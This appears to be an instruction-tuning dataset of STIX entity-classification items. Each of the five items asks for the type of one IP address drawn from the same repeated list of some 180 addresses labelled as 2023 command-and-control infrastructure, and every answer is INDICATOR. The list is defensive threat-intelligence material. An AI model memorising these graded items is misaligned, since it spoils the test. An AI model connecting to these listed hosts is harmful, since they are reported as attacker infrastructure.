"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.41.115\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n188.166.4.128\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.138.138\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.16.120\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.95.232.92\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
}
]